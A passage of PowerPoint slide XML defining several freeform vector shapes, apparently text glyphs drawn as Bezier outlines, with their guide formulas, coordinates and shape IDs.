                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 57 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 57 w 259"/>
                <a:gd name="T23" fmla="*/ 99 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 259"/>
                <a:gd name="T27" fmla="*/ 72 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 152 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 144 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 259"/>
                <a:gd name="T41" fmla="*/ 99 h 218"/>
                <a:gd name="T42" fmla="*/ 185 w 259"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 72 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 202 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 259"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 187 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 57 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="57" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="3"/>
                    <a:pt x="46" y="3"/>
                    <a:pt x="37" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="11" y="34"/>
                    <a:pt x="29" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="14" y="218"/>
                    <a:pt x="21" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="74" y="188"/>
                    <a:pt x="57" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="54"/>
                    <a:pt x="77" y="31"/>
                    <a:pt x="97" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="31"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="188"/>
                    <a:pt x="94" y="188"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="162" y="188"/>
                    <a:pt x="144" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="54"/>
                    <a:pt x="164" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="31"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="195" y="218"/>
                    <a:pt x="202" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="188"/>
                    <a:pt x="249" y="188"/>
                    <a:pt x="231" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="0"/>
                    <a:pt x="151" y="7"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="9"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="57" y="1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75" name="Freeform 216">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C2A9EC-CB64-4EE9-9880-74EEC650B91B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1746251" y="3257551"/>
              <a:ext cx="85725" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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76" name="Freeform 217">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B17AE6D2-5074-481C-81AC-AE60B28DD101}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId17"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1847851" y="3259138"/>
              <a:ext cx="104775" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 250"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 250"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 250"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 250"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 250"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 250"/>
                <a:gd name="T11" fmla="*/ 34 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 250"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 250"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 250"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 250"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 250"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 250"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 250"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 250"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 250"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 250"/>
                <a:gd name="T33" fmla="*/ 75 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 250"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 250"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 250"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 250"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 250"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 250 w 250"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 250"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 250"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 250"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 250"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 250"/>
                <a:gd name="T55" fmla="*/ 2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0" h="218">
                  <a:moveTo>
                    <a:pt x="77" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="11"/>
                    <a:pt x="77" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="218"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="119" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="188"/>
                    <a:pt x="107" y="188"/>
                    <a:pt x="99" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="100"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="50"/>
                    <a:pt x="114" y="31"/>
                    <a:pt x="139" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="31"/>
                    <a:pt x="173" y="45"/>
                    <a:pt x="173" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="188"/>
                    <a:pt x="133" y="188"/>
                    <a:pt x="133" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="218"/>
                    <a:pt x="250" y="218"/>
                    <a:pt x="250" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="188"/>
                    <a:pt x="237" y="188"/>
                    <a:pt x="229" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="22"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="0"/>
                    <a:pt x="86" y="17"/>
                    <a:pt x="77" y="2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77" name="Freeform 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3AD97FF-8AE3-4972-8992-2AF58911217D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId18"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1960564" y="3232151"/>
              <a:ext cx="88900" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 212"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 212"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 212"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 212"/>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79">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="204"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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78" name="Freeform 219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31A230F8-E816-429A-8736-89496C78AE0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId19"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2108201" y="3327401"/>
              <a:ext cx="25400" cy="26988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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79" name="Freeform 220">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{229BE51C-A6C7-4FBC-9188-5A5543F0F959}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId20"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2179639" y="3259138"/>
              <a:ext cx="103188" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 220 w 245"/>
                <a:gd name="T1" fmla="*/ 31 h 217"/>
                <a:gd name="T2" fmla="*/ 245 w 245"/>
                <a:gd name="T3" fmla="*/ 15 h 217"/>
                <a:gd name="T4" fmla="*/ 224 w 245"/>
                <a:gd name="T5" fmla="*/ 0 h 217"/>
                <a:gd name="T6" fmla="*/ 167 w 245"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 146 w 245"/>
                <a:gd name="T9" fmla="*/ 15 h 217"/>
                <a:gd name="T10" fmla="*/ 167 w 245"/>
                <a:gd name="T11" fmla="*/ 31 h 217"/>
                <a:gd name="T12" fmla="*/ 191 w 245"/>
                <a:gd name="T13" fmla="*/ 31 h 217"/>
                <a:gd name="T14" fmla="*/ 166 w 245"/>
                <a:gd name="T15" fmla="*/ 179 h 217"/>
                <a:gd name="T16" fmla="*/ 166 w 245"/>
                <a:gd name="T17" fmla="*/ 179 h 217"/>
                <a:gd name="T18" fmla="*/ 151 w 245"/>
                <a:gd name="T19" fmla="*/ 123 h 217"/>
                <a:gd name="T20" fmla="*/ 123 w 245"/>
                <a:gd name="T21" fmla="*/ 86 h 217"/>
                <a:gd name="T22" fmla="*/ 103 w 245"/>
                <a:gd name="T23" fmla="*/ 97 h 217"/>
                <a:gd name="T24" fmla="*/ 80 w 245"/>
                <a:gd name="T25" fmla="*/ 179 h 217"/>
                <a:gd name="T26" fmla="*/ 80 w 245"/>
                <a:gd name="T27" fmla="*/ 179 h 217"/>
                <a:gd name="T28" fmla="*/ 54 w 245"/>
                <a:gd name="T29" fmla="*/ 31 h 217"/>
                <a:gd name="T30" fmla="*/ 78 w 245"/>
